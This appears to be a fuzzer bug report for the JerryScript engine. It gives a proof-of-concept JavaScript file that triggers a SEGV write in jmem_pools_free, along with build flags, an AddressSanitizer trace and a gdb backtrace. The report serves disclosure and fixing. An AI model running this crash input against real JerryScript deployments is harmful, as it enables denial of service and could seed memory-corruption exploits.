SEGV ./jerry-core/jmem/jmem-poolman.c:136:29 in jmem_pools_free

[gandalf4a]

JerryScript revision

$ git show
commit a588e4966175a190ec6350b2a3689d30ed017ec9 (HEAD -> master, origin/master, origin/HEAD)
Author: Máté Tokodi <[email protected]>
Date:   Wed Sep 20 15:38:30 2023 +0200

Build & Execution platform

$ uname -a
Linux user-AYA-NEO-FOUNDER 5.19.0-43-generic #44~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon May 22 13:39:36 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

Build steps

export CC=clang
python tools/build.py --compile-flag=-fsanitize-coverage=trace-pc-guard --compile-flag="-fsanitize=address -g" --profile=es.next --lto=off --compile-flag=-D_POSIX_C_SOURCE=200809 --stack-limit=15 --compile-flag=-Werror --compile-flag=-Wincompatible-pointer-types --compile-flag=-Wno-strict-prototypes

Test case

the pocfile.js

async function f0(a1, a2) {
    function f5(a6, a7, a8, a9) {
        return f5;
    }
    var o10 = {
        "get": Object,
    };
    await 785.2893486668286;
    try {
        f0["F"](h);
    } catch(e16) {
    }
    function f18(a19, a20) {
        return f0;
    }
    var v21 = new Proxy(a1, o10);
    try {
        undefined[Uint8Array](MAX_SAFE_INTEGER);
    } catch(e26) {
        var v27 = 99 | 99;
        for (var v28 = 0; v28 < 100; v28++) {
            try {
                eval(String.fromCodePoint(v27, v28));
                prototype[POSITIVE_INFINITY]();
            } catch(e36) {
            }
        }
    }
    return v21;
}
f0(f0);
// CRASH INFO
// ==========
// TERMSIG: 11
// STDERR:
// 
// STDOUT:
// 
// ARGS: /home/user/jerryscript/build/bin/jerry --reprl-fuzzilli
// EXECUTION TIME: 26ms

Execution steps

./build/bin/jerry pocfile.js

Output

asan report:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==4174418==ERROR: AddressSanitizer: SEGV on unknown address 0x000002032210 (pc 0x00000041ee08 bp 0x000000000008 sp 0x7ffcc387dd60 T0)
==4174418==The signal is caused by a WRITE memory access.
    #0 0x41ee08 in jmem_pools_free /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/jmem/jmem-poolman.c:136:29
    #1 0x580591 in vm_stack_context_abort_variable_length /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm-stack.c:73:5
    #2 0x580591 in vm_stack_context_abort /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm-stack.c:125:24
    #3 0x580cbc in vm_stack_find_finally /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm-stack.c:420:19
    #4 0x58f8a3 in vm_loop /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:4892:15
    #5 0x582c82 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5211:37
    #6 0x57b6db in opfunc_resume_executable_object /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/opcodes.c:758:25
    #7 0x529e88 in ecma_process_promise_async_reaction_job /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:363:12
    #8 0x529e88 in ecma_process_all_enqueued_jobs /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:567:15
    #9 0x4dbf52 in jerry_run_jobs /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/api/jerryscript.c:1078:24
    #10 0x4d7208 in main /home/user/fuzz/jerryscript_origin/jerryscript/jerry-main/main-desktop.c:229:12
    #11 0x7efc7c629d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #12 0x7efc7c629e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #13 0x41ee74 in _start (/home/user/fuzz/jerryscript_origin/jerryscript/build/bin/jerry+0x41ee74)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/jmem/jmem-poolman.c:136:29 in jmem_pools_free
==4174418==ABORTING

Backtrace

$ gdb -nx -q ./jerry -ex 'r /home/user/vul/crash/Jerryscript/out/crashes/program_20230412010753_28034C1C-6509-445B-8305-557EE504E083_deterministic.js'
Reading symbols from ./jerry...
Starting program: /home/user/fuzz/jerryscript_origin/jerryscript/build/bin/jerry /home/user/vul/crash/Jerryscript/out/crashes/program_20230412010753_28034C1C-6509-445B-8305-557EE504E083_deterministic.js
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x000000000041d592 in jmem_heap_find_prev (block_p=<optimized out>) at /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/jmem/jmem-heap.c:379
379	  while (prev_p->next_offset < block_offset)
(gdb) 

Expected behavior

SEGV or crash

Credits:

@gandalf4a